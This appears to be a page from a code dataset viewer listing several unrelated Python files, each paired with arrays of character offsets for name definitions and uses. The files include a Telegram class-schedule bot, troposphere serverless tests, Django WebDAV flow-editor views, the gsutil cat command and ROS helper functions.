sendTo += "Waktu: "+kelas[1]+", "+kelas[2]+kelas[3]+"\n"
sendTo += "Dosen: "+kelas[4]+"\n"
if kelas[5] == "PTM":
sendTo += "Room:" + kelas[5]
elif kelas[5] == "Meet":
sendTo += "Room:" +'G'+ kelas[5]
else:#angka
sendTo += "MeetID: "+kelas[5]+"\n"
sendTo += "Pass: "+kelas[6]
bot.send_message(message.chat.id, sendTo)
bot.send_message(message.chat.id, "Selamat Kuliah!")
else:
bot.send_message(message.chat.id, "Maaf, kode kelas "+classCode.upper()+" belum ada di list.")
@bot.message_handler(commands=['timer', 'help'])
def notyetCom(message):
bot.send_message(message.chat.id, "Under Construction")
#Commands Child
@bot.message_handler(func=Greet)
def GreetCH(message):
bot.send_message(message.chat.id, "Halo "+message.chat.first_name+" :)")
@bot.message_handler(func=feedbackCatch)
def GreetCH(message):
with open('feedback.txt','a') as f:
f.write(message.text)
#bot.send_message(895523970, str(message.chat.first_name)+":"+message.text)
bot.send_message(message.chat.id, "Pesan terkirim :)")
@bot.message_handler(func=ClassCode)
def ClassCH(message):
if messageBool[0]:
bot.send_message(message.chat.id, "OK, kelasmu tercatat: "+(message.text).upper())
schedulesCom(message,message.text)
csvH.changeClass(csvH.checkID(message.chat.id), (message.text).upper())
messageBool[0] = False
else:
bot.send_message(message.chat.id, "Ketik /classcode untuk mengganti kode kelas, atau /schedules untuk melihat jadwal kelasmu")
if __name__ == "__main__":
Echooo("Hi! Server On 7-12 Maret 2022")
# bot.infinity_polling()
# time.sleep(2)
| [
[
[
7,
11
]
],
[
[
22,
29
],
[
187,
194
]
],
[
[
55,
68
],
[
516,
529
]
],
[
[
70,
85
],
[
631,
646
]
],
[
[
94,
108
],
[
2333,
2336
]
],
[
[
117,
135
],
[
378,
382
],
[
1055,
1059
],
[
1132,
1136
],
[
2282,
2286
],
[
3916,
3920
],
[
3933,
3937
]
],
[
[
167,
174
],
[
203,
210
]
],
[
[
181,
184
],
[
930,
933
],
[
1286,
1289
],
[
1667,
1670
],
[
1936,
1939
],
[
2153,
2156
],
[
3112,
3115
],
[
3267,
3270
],
[
3408,
3411
],
[
3688,
3691
],
[
401,
404
],
[
996,
999
],
[
1464,
1467
],
[
1558,
1561
],
[
1868,
1871
],
[
2082,
2085
],
[
2888,
2891
],
[
2940,
2943
],
[
3013,
3016
],
[
3190,
3193
],
[
3327,
3330
],
[
3629,
3632
],
[
3780,
3783
],
[
4040,
4043
]
],
[
[
292,
303
],
[
860,
871
],
[
1771,
1782
],
[
3755,
3766
],
[
3997,
4008
]
],
[
[
343,
349
],
[
4202,
4208
]
],
[
[
441,
446
],
[
3292,
3297
]
],
[
[
577,
586
],
[
3713,
3722
]
],
[
[
694,
706
]
],
[
[
828,
841
],
[
3433,
3446
]
],
[
[
975,
980
]
],
[
[
1335,
1343
],
[
1100,
1108
]
],
[
[
1713,
1722
]
],
[
[
1984,
1995
]
],
[
[
2202,
2214
],
[
3872,
3884
]
],
[
[
3165,
3174
]
],
[
[
3304,
3311
]
],
[
[
3453,
3460
]
],
[
[
3729,
3736
]
],
[
[
1398,
1409
]
],
[
[
1812,
1823
]
],
[
[
2035,
2046
]
]
] |
#!/usr/bin/python3
# encoding: utf-8
### python script to interact with Complice
### giovanni, Saturday, April 10, 2021, 2:11 PM
### March 2022 updated to Python 3
import sys
from config import POMOLENGTH, TIMERLENGTH, TOKEN
import complice_post
myInput = sys.argv[1]
if myInput == "startTimer":
complice_post.start_hourglass()
if myInput == "startPomo":
complice_post.start_pomo()
if myInput == "Timer30":
complice_post.start_custom_hourglass30()
if myInput == "Timer60":
complice_post.start_custom_hourglass60()
if myInput == "runningTimerPause":
complice_post.pause_timer()
if myInput == "runningTimerCancel":
complice_post.cancel_timer()
if myInput == "pausedTimerCancel":
complice_post.cancel_timer()
if myInput == "restartTimer":
complice_post.restart_hourglass()
if myInput == "runningPomo":
complice_post.cancel_timer()
if myInput == "breaking":
complice_post.cancel_timer()
| [
[
[
174,
177
],
[
268,
271
]
],
[
[
197,
207
]
],
[
[
209,
220
]
],
[
[
222,
227
]
],
[
[
235,
248
],
[
313,
326
],
[
378,
391
],
[
440,
453
],
[
515,
528
],
[
596,
609
],
[
665,
678
],
[
734,
747
],
[
799,
812
],
[
867,
880
],
[
927,
940
]
],
[
[
258,
265
],
[
284,
291
],
[
350,
357
],
[
414,
421
],
[
489,
496
],
[
560,
567
],
[
628,
635
],
[
698,
705
],
[
768,
775
],
[
837,
844
],
[
900,
907
]
]
] |
import unittest
from troposphere import Tags, Template
from troposphere.s3 import Filter, Rules, S3Key
from troposphere.serverless import (
Api, DeadLetterQueue, DeploymentPreference, Function, FunctionForPackaging,
LayerVersion, S3Event, S3Location, SimpleTable,
)
class TestServerless(unittest.TestCase):
def test_exactly_one_code(self):
serverless_func = Function(
"SomeHandler",
Handler="index.handler",
Runtime="nodejs",
CodeUri=S3Location(
Bucket="mybucket",
Key="mykey",
),
InlineCode="",
)
t = Template()
t.add_resource(serverless_func)
with self.assertRaises(ValueError):
t.to_json()
def test_s3_location(self):
serverless_func = Function(
"SomeHandler",
Handler="index.handler",
Runtime="nodejs",
CodeUri=S3Location(
Bucket="mybucket",
Key="mykey",
)
)
t = Template()
t.add_resource(serverless_func)
t.to_json()
def test_tags(self):
serverless_func = Function(
"SomeHandler",
Handler="index.handler",
Runtime="nodejs",
CodeUri="s3://bucket/handler.zip",
Tags=Tags({
'Tag1': 'TagValue1',
'Tag2': 'TagValue2'
})
)
t = Template()
t.add_resource(serverless_func)
t.to_json()
def test_DLQ(self):
serverless_func = Function(
"SomeHandler",
Handler="index.handler",
Runtime="nodejs",
CodeUri="s3://bucket/handler.zip",
DeadLetterQueue=DeadLetterQueue(
Type='SNS',
TargetArn='arn:aws:sns:us-east-1:000000000000:SampleTopic'
)
)
t = Template()
t.add_resource(serverless_func)
t.to_json()
def test_required_function(self):
serverless_func = Function(
"SomeHandler",
Handler="index.handler",
Runtime="nodejs",
CodeUri="s3://bucket/handler.zip"
)
t = Template()
t.add_resource(serverless_func)
t.to_json()
def test_optional_auto_publish_alias(self):
serverless_func = Function(
"SomeHandler",
Handler="index.handler",
Runtime="nodejs",
CodeUri="s3://bucket/handler.zip",
AutoPublishAlias="alias"
)
t = Template()
t.add_resource(serverless_func)
t.to_json()
def test_optional_deployment_preference(self):
serverless_func = Function(
"SomeHandler",
Handler="index.handler",
Runtime="nodejs",
CodeUri="s3://bucket/handler.zip",
AutoPublishAlias="alias",
DeploymentPreference=DeploymentPreference(
Type="AllAtOnce"
)
)
t = Template()
t.add_resource(serverless_func)
t.to_json()
def test_required_api_definitionuri(self):
serverless_api = Api(
"SomeApi",
StageName='test',
DefinitionUri='s3://bucket/swagger.yml',
)
t = Template()
t.add_resource(serverless_api)
t.to_json()
swagger = {
"swagger": "2.0",
"info": {
"title": "swagger test",
},
"paths": {
"/test": {
"get": {
},
},
},
}
def test_required_api_both(self):
serverless_api = Api(
"SomeApi",
StageName='test',
DefinitionUri='s3://bucket/swagger.yml',
DefinitionBody=self.swagger,
)
t = Template()
t.add_resource(serverless_api)
with self.assertRaises(ValueError):
t.to_json()
def test_required_api_definitionbody(self):
serverless_api = Api(
"SomeApi",
StageName='test',
DefinitionBody=self.swagger,
)
t = Template()
t.add_resource(serverless_api)
t.to_json()
def test_api_no_definition(self):
serverless_api = Api(
"SomeApi",
StageName='test',
)
t = Template()
t.add_resource(serverless_api)
t.to_json()
def test_simple_table(self):
serverless_table = SimpleTable(
"SomeTable"
)
t = Template()
t.add_resource(serverless_table)
t.to_json()
def test_layer_version(self):
layer_version = LayerVersion(
"SomeLayer",
ContentUri="someuri",
)
t = Template()
t.add_resource(layer_version)
t.to_json()
layer_version = LayerVersion(
"SomeLayer",
)
t = Template()
t.add_resource(layer_version)
with self.assertRaises(ValueError):
t.to_json()
def test_s3_filter(self):
t = Template()
t.add_resource(
Function(
"ProcessorFunction",
Handler='process_file.handler',
CodeUri='.',
Runtime='python3.6',
Policies='AmazonS3FullAccess',
Events={
'FileUpload': S3Event(
'FileUpload',
Bucket="bucket",
Events=['s3:ObjectCreated:*'],
Filter=Filter(S3Key=S3Key(
Rules=[
Rules(Name="prefix", Value="upload/"),
Rules(Name="suffix", Value=".txt"),
],
))
)
}
)
)
t.to_json()
def test_policy_document(self):
t = Template()
t.add_resource(
Function(
"ProcessorFunction",
Handler='process_file.handler',
CodeUri='.',
Runtime='python3.6',
Policies="AmazonS3ReadOnly"
)
)
t.to_json()
t = Template()
t.add_resource(
Function(
"ProcessorFunction",
Handler='process_file.handler',
CodeUri='.',
Runtime='python3.6',
Policies=["AmazonS3FullAccess", "AmazonDynamoDBFullAccess"]
)
)
t.to_json()
t = Template()
t.add_resource(
Function(
"ProcessorFunction",
Handler='process_file.handler',
CodeUri='.',
Runtime='python3.6',
Policies={
"Statement": [{
"Effect": "Allow",
"Action": ["s3:GetObject", "s3:PutObject"],
"Resource": ["arn:aws:s3:::bucket/*"],
}]
},
)
)
t.to_json()
def test_packaging(self):
# test for no CodeUri or InlineCode
t = Template()
t.add_resource(
FunctionForPackaging(
"ProcessorFunction",
Handler='process_file.handler',
Runtime='python3.6',
Policies={
"Statement": [{
"Effect": "Allow",
"Action": ["s3:GetObject", "s3:PutObject"],
"Resource": ["arn:aws:s3:::bucket/*"],
}]
},
)
)
t.to_json()
if __name__ == '__main__':
unittest.main()
| [
[
[
7,
15
],
[
297,
305
],
[
7809,
7817
]
],
[
[
40,
44
],
[
1349,
1353
]
],
[
[
46,
54
],
[
644,
652
],
[
1058,
1066
],
[
1466,
1474
],
[
1923,
1931
],
[
2231,
2239
],
[
2587,
2595
],
[
3049,
3057
],
[
3326,
3334
],
[
3862,
3870
],
[
4175,
4183
],
[
4389,
4397
],
[
4579,
4587
],
[
4805,
4813
],
[
4960,
4968
],
[
5120,
5128
],
[
5994,
6002
],
[
6303,
6311
],
[
6644,
6652
],
[
7262,
7270
]
],
[
[
82,
88
],
[
5608,
5614
]
],
[
[
90,
95
],
[
5696,
5701
],
[
5767,
5772
]
],
[
[
97,
102
],
[
5621,
5626
]
],
[
[
144,
147
],
[
3193,
3196
],
[
3688,
3691
],
[
4054,
4057
],
[
4309,
4312
]
],
[
[
149,
164
],
[
1767,
1782
]
],
[
[
166,
186
],
[
2958,
2978
]
],
[
[
188,
196
],
[
380,
388
],
[
822,
830
],
[
1181,
1189
],
[
1588,
1596
],
[
2059,
2067
],
[
2377,
2385
],
[
2736,
2744
],
[
5167,
5175
],
[
6041,
6049
],
[
6350,
6358
],
[
6691,
6699
]
],
[
[
198,
218
],
[
7309,
7329
]
],
[
[
224,
236
],
[
4710,
4722
],
[
4899,
4911
]
],
[
[
238,
245
],
[
5434,
5441
]
],
[
[
247,
257
],
[
504,
514
],
[
946,
956
]
],
[
[
259,
270
],
[
4520,
4531
]
],
[
[
282,
296
]
]
] |
from django.shortcuts import render
from django.http import JsonResponse
from django.http import HttpResponse, HttpResponseNotFound
from django.contrib.auth.decorators import login_required
from floweditor.models import B1if
from easywebdavbiffy import *
import xmltodict
import StringIO
from zipfile import ZipFile
from xml.dom.minidom import parseString
# Renders work area, hands over list of b1if servers
@login_required
def index(request):
account_id = request.user.biffyuser.account.id
b1if_servers = B1if.objects.filter(account_id=account_id).order_by('name')
context = {
'b1if_servers': b1if_servers
}
return render(request, 'floweditor/workarea.html', context)
# Gets a list of scenarios - .vPac is the content for un-assigned flows
@login_required
def getScenarios(request):
b1if_server = B1if.objects.get(id=request.POST['server'])
if(b1if_server.account != request.user.biffyuser.account):
return HttpResponseNotFound();
#b1if_server = B1if.objects.get(id=1)
webdav = ewdconnect(b1if_server.server, port=b1if_server.port, username=b1if_server.user, password=b1if_server.password)
#print b1if_server.server+":"+b1if_server.port
folders = webdav.ls(b1if_server.path)
scenarios = []
for f in folders:
fname = f.name.rsplit('/')[-1]
# Folders starting with vPac. are scenarios, don't include SAP generated scenarios
if 'vPac.' in fname and not 'vPac.sap.' in fname:
scenarios.append(fname)
return JsonResponse({'scenarios':scenarios,'path':b1if_server.path})
# JSON Returns a list of flows for a scenario - read from the vBIU list in the scenario vPac file
@login_required
def getScenarioFlows(request):
b1if_server = B1if.objects.get(id=request.POST['server'])
if(b1if_server.account != request.user.biffyuser.account):
return HttpResponseNotFound();
webdav = ewdconnect(b1if_server.server, port=b1if_server.port, username=b1if_server.user, password=b1if_server.password)
path = b1if_server.path+request.POST['scenario']+'/vPac.xml'
virtual_file = StringIO.StringIO()
webdav.download(path,virtual_file)
file_contents = virtual_file.getvalue()
flows = []
doc = xmltodict.parse(file_contents)
#print doc['vPac']['vBIUList']
for vbiu in doc['vPac']['vBIUList']['vBIU']:
flows.append(vbiu['@Id'])
return JsonResponse({'flows':flows,'path':b1if_server.path,})
# JSON Returns a list of files for a scenario flow
@login_required
def getFlowFiles(request):
b1if_server = B1if.objects.get(id=request.POST['server'])
if(b1if_server.account != request.user.biffyuser.account):
return HttpResponseNotFound();
webdav = ewdconnect(b1if_server.server, port=b1if_server.port, username=b1if_server.user, password=b1if_server.password)
path = b1if_server.path+'vBIU.'+request.POST['flow']
folders = webdav.ls(path)
files = []
for f in folders:
fname = f.name.rsplit('/')[-1]
files.append(fname)
return JsonResponse({'files':files,'path':path})
# JSON Returns a files content
@login_required
def getFlowFileContent(request):
b1if_server = B1if.objects.get(id=request.POST['server'])
if(b1if_server.account != request.user.biffyuser.account):
return HttpResponseNotFound();
webdav = ewdconnect(b1if_server.server, port=b1if_server.port, username=b1if_server.user, password=b1if_server.password)
path = b1if_server.path+'vBIU.'+request.POST['flow']+'/'+request.POST['file']
virtual_file = StringIO.StringIO()
webdav.download(path,virtual_file)
return JsonResponse({'file_content':virtual_file.getvalue(),'path':path})
# JSON Saves a files content - returns True/False
# Writes the new file to .floweditor.xml (pro tip, the webdav server will Base64 encode
# your file if it doesn't end in .xml or .xsl)
# Will bails if the upload fails instead of overwriting the old file
# with a blank new file (severely painful past experience here)
# Deletes the old file and moves the new file to the old name
# Deletes old move files first
@login_required
def saveFlowFileContent(request):
b1if_server = B1if.objects.get(id=request.POST['server'])
if(b1if_server.account != request.user.biffyuser.account):
return HttpResponseNotFound();
webdav = ewdconnect(b1if_server.server, port=b1if_server.port, username=b1if_server.user, password=b1if_server.password)
path = b1if_server.path+'vBIU.'+request.POST['flow']+'/'+request.POST['file']
temp_path = b1if_server.path+'vBIU.'+request.POST['flow']+'/floweditor.'+request.POST['file']
new_file_content = request.POST['file_content']
if webdav.exists(temp_path)==True:
webdav.delete(temp_path)
virtual_file = StringIO.StringIO()
virtual_file.write(new_file_content)
webdav.upload(virtual_file,temp_path)
response = False
if webdav.exists(temp_path)==True:
webdav.delete(path)
webdav.move(temp_path,path)
response = True
return JsonResponse({'success':response})
@login_required
def downloadScenarioZip(request):
b1if_server = B1if.objects.get(id=request.POST['server'])
if(b1if_server.account != request.user.biffyuser.account):
return HttpResponseNotFound();
scenario = request.POST['scenario']
webdav = ewdconnect(b1if_server.server, port=b1if_server.port, username=b1if_server.user, password=b1if_server.password)
path = b1if_server.path+scenario
files = webdav.ls(path)
zipOutputFile = StringIO.StringIO()
zipFile = ZipFile(zipOutputFile, 'w')
#zipFile.writestr('/b1ifident.xml', 'test')
zipFile.writestr('/b1ifident.xml', '<?xml version="1.0" encoding="UTF-8"?><b1ifident xmlns:bfa="urn:com.sap.b1i.bizprocessor:bizatoms"><id>'+str(scenario.replace('vPac.',''))+'</id><type>vPac</type><ver>1.0.0</ver></b1ifident>')
for f in files:
virtual_file = StringIO.StringIO()
webdav.download(f.name,virtual_file)
zipFile.writestr(f.name.replace('/B1iXcellerator/exec/webdav',''), virtual_file.getvalue())
path = b1if_server.path+scenario+'/vPac.xml'
virtual_file = StringIO.StringIO()
webdav.download(path,virtual_file)
file_contents = virtual_file.getvalue()
doc = xmltodict.parse(file_contents)
#print doc['vPac']['vBIUList']
for vbiu in doc['vPac']['vBIUList']['vBIU']:
flow = vbiu['@Id']
path = b1if_server.path+'vBIU.'+flow
folders = webdav.ls(path)
for f in folders:
virtual_file = StringIO.StringIO()
webdav.download(f.name,virtual_file)
zipFile.writestr(f.name.replace('/B1iXcellerator/exec/webdav',''), virtual_file.getvalue())
zipFile.close()
zipOutputFile.seek(0)
#response = HttpResponse(zipOutputFile.read())
response = HttpResponse(zipOutputFile.getvalue())
response['Content-Disposition'] = 'attachment; filename=%s.zip' %(scenario)
response['Content-Type'] = 'application/x-zip'
return response
@login_required
def formatXML(request):
input_xml = request.POST['xml']
error = []
#xmlDom = xml.dom.minidom.parseString(input_xml)
formatted_xml = '\n'.join([line for line in parseString(input_xml).toprettyxml(indent=' '*2).split('\n') if line.strip()])
#formatted_xml = lambda formatted_xml: '\n'.join([line for line in parseString(formatted_xml).toprettyxml(indent=' '*2).split('\n') if line.strip()])
return JsonResponse({'formatted_xml':formatted_xml,'error':error}) | [
[
[
29,
35
],
[
629,
635
]
],
[
[
60,
72
],
[
1438,
1450
],
[
2259,
2271
],
[
2858,
2870
],
[
3414,
3426
],
[
4753,
4765
],
[
7009,
7021
]
],
[
[
97,
109
],
[
6408,
6420
]
],
[
[
111,
131
],
[
926,
946
],
[
1774,
1794
],
[
2537,
2557
],
[
3109,
3129
],
[
4073,
4093
],
[
4967,
4987
]
],
[
[
175,
189
],
[
411,
425
],
[
756,
770
],
[
1600,
1614
],
[
2367,
2381
],
[
2933,
2947
],
[
3896,
3910
],
[
4790,
4804
],
[
6592,
6606
]
],
[
[
220,
224
],
[
510,
514
],
[
813,
817
],
[
1661,
1665
],
[
2424,
2428
],
[
2996,
3000
],
[
3960,
3964
],
[
4854,
4858
]
],
[
[
253,
254
],
[
999,
1009
],
[
1808,
1818
],
[
2571,
2581
],
[
3143,
3153
],
[
4107,
4117
],
[
5039,
5049
]
],
[
[
262,
271
],
[
2114,
2123
],
[
5916,
5925
]
],
[
[
279,
287
],
[
1998,
2006
],
[
3350,
3358
],
[
4523,
4531
],
[
5227,
5235
],
[
5596,
5604
],
[
5812,
5820
],
[
6151,
6159
]
],
[
[
308,
315
],
[
5259,
5266
]
],
[
[
344,
355
],
[
6771,
6782
]
],
[
[
430,
435
]
],
[
[
775,
787
]
],
[
[
1619,
1635
]
],
[
[
2386,
2398
]
],
[
[
2952,
2970
]
],
[
[
3915,
3934
]
],
[
[
4809,
4828
]
],
[
[
6611,
6620
]
]
] |
# -*- coding: utf-8 -*-
# Copyright 2011 Google Inc. All Rights Reserved.
# Copyright 2011, Nexenta Systems Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Implementation of Unix-like cat command for cloud storage providers."""
from __future__ import absolute_import
import re
from gslib.cat_helper import CatHelper
from gslib.command import Command
from gslib.command_argument import CommandArgument
from gslib.cs_api_map import ApiSelector
from gslib.exception import CommandException
from gslib.util import NO_MAX
_SYNOPSIS = """
gsutil cat [-h] url...
"""
_DETAILED_HELP_TEXT = ("""
<B>SYNOPSIS</B>
""" + _SYNOPSIS + """
<B>DESCRIPTION</B>
The cat command outputs the contents of one or more URLs to stdout.
It is equivalent to doing:
gsutil cp url... -
(The final '-' causes gsutil to stream the output to stdout.)
<B>WARNING: DATA INTEGRITY CHECKING NOT DONE</B>
The gsutil cat command does not compute a checksum of the downloaded data.
Therefore, we recommend that users either perform their own validation of the
output of gsutil cat or use gsutil cp or rsync (both of which perform
integrity checking automatically).
<B>OPTIONS</B>
-h Prints short header for each object. For example:
gsutil cat -h gs://bucket/meeting_notes/2012_Feb/*.txt
This would print a header with the object name before the contents
of each text object that matched the wildcard.
-r range Causes gsutil to output just the specified byte range of the
object. Ranges are can be of these forms:
start-end (e.g., -r 256-5939)
start- (e.g., -r 256-)
-numbytes (e.g., -r -5)
where offsets start at 0, start-end means to return bytes start
through end (inclusive), start- means to return bytes start
through the end of the object, and -numbytes means to return the
last numbytes of the object. For example:
gsutil cat -r 256-939 gs://bucket/object
returns bytes 256 through 939, while:
gsutil cat -r -5 gs://bucket/object
returns the final 5 bytes of the object.
""")
class CatCommand(Command):
"""Implementation of gsutil cat command."""
# Command specification. See base class for documentation.
command_spec = Command.CreateCommandSpec(
'cat',
command_name_aliases=[],
usage_synopsis=_SYNOPSIS,
min_args=1,
max_args=NO_MAX,
supported_sub_args='hr:',
file_url_ok=False,
provider_url_ok=False,
urls_start_arg=0,
gs_api_support=[ApiSelector.XML, ApiSelector.JSON],
gs_default_api=ApiSelector.JSON,
argparse_arguments=[
CommandArgument.MakeZeroOrMoreCloudURLsArgument()
]
)
# Help specification. See help_provider.py for documentation.
help_spec = Command.HelpSpec(
help_name='cat',
help_name_aliases=[],
help_type='command_help',
help_one_line_summary='Concatenate object content to stdout',
help_text=_DETAILED_HELP_TEXT,
subcommand_help_text={},
)
# Command entry point.
def RunCommand(self):
"""Command entry point for the cat command."""
show_header = False
request_range = None
start_byte = 0
end_byte = None
if self.sub_opts:
for o, a in self.sub_opts:
if o == '-h':
show_header = True
elif o == '-r':
request_range = a.strip()
range_matcher = re.compile(
'^(?P<start>[0-9]+)-(?P<end>[0-9]*)$|^(?P<endslice>-[0-9]+)$')
range_match = range_matcher.match(request_range)
if not range_match:
raise CommandException('Invalid range (%s)' % request_range)
if range_match.group('start'):
start_byte = long(range_match.group('start'))
if range_match.group('end'):
end_byte = long(range_match.group('end'))
if range_match.group('endslice'):
start_byte = long(range_match.group('endslice'))
else:
self.RaiseInvalidArgumentException()
return CatHelper(self).CatUrlStrings(self.args,
show_header=show_header,
start_byte=start_byte,
end_byte=end_byte)
| [
[
[
758,
773
]
],
[
[
782,
784
],
[
4038,
4040
]
],
[
[
815,
824
],
[
4659,
4668
]
],
[
[
851,
858
],
[
2753,
2760
],
[
2888,
2895
],
[
3416,
3423
]
],
[
[
894,
909
],
[
3276,
3291
]
],
[
[
939,
950
],
[
3164,
3175
],
[
3181,
3192
],
[
3221,
3232
]
],
[
[
979,
995
],
[
4234,
4250
]
],
[
[
1019,
1025
],
[
3024,
3030
]
],
[
[
1027,
1036
],
[
1122,
1131
],
[
2980,
2989
]
],
[
[
1073,
1092
],
[
3601,
3620
]
],
[
[
2742,
2752
]
]
] |
from math import sqrt
from math import pi
import json
import tf
from geometry_msgs.msg import Quaternion
def dynamic_euclid_dist(a, b):
o = 0
for i in range(len(a)):
o += (a[i]-b[i])**2
return sqrt(o)
def quaternion_from_euler(roll, pitch, yaw):
'''
From HSR's utils.py
'''
q = tf.transformations.quaternion_from_euler(roll / 180.0 * pi,
pitch / 180.0 * pi,
yaw / 180.0 * pi, 'rxyz')
return Quaternion(q[0], q[1], q[2], q[3])
def euler_from_quaternion(q):
q = tf.transformations.euler_from_quaternion([q.x, q.y, q.z, q.w], 'rxyz')
return (q[0]/pi * 180, q[1]/pi * 180, q[2]/pi * 180)
def str_to_obj(string):
"""
Converts JSON string to data structure
Args:
string (str): valid JSON string
Raises:
ValueError: if input isnt a valid JSON string
Returns:
Data structure: [description]
"""
try:
return json.loads(string)
except ValueError as e:
raise ValueError("ValueError occured when loading JSON string: {}, the input was: {}".format(e, string))
def obj_to_str(obj):
return json.dumps(obj) | [
[
[
17,
21
],
[
214,
218
]
],
[
[
39,
41
],
[
372,
374
],
[
441,
443
],
[
508,
510
],
[
698,
700
],
[
713,
715
],
[
728,
730
]
],
[
[
49,
53
],
[
1017,
1021
],
[
1214,
1218
]
],
[
[
61,
63
],
[
316,
318
],
[
610,
612
]
],
[
[
94,
104
],
[
536,
546
]
],
[
[
110,
129
]
],
[
[
227,
248
]
],
[
[
576,
597
]
],
[
[
743,
753
]
],
[
[
1186,
1196
]
]
] |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.